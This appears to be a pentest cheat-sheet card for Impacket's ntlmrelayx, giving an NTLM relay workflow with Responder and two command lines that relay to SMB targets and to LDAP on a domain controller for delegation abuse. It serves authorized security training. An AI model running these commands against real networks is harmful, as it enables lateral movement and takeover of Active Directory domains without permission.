All tools

Active Directory

ntlmrelayx (Impacket)

Relays NTLM authentications to other services for auth abuse.

advanced
Linux
Exploitation
Lateral Movement

Authorized testing only. Practice on systems you own, isolated labs, or targets with written permission. Unauthorized access is illegal.

When

Combined with Responder/coercion when signing is disabled.

How

Disable SMB on Responder; run ntlmrelayx to targets; execute or dump.

Why

One of the most important internal AD attack techniques to understand.

Commands & usage

impacket-ntlmrelayx -tf targets.txt -smb2support -i
impacket-ntlmrelayx -t ldap://dc01 -wh attacker --delegate-access

Commands are educational examples. Adapt hosts, paths, and rates to your authorized scope.

Tags

ntlm
relay
ad

Related in Active Directory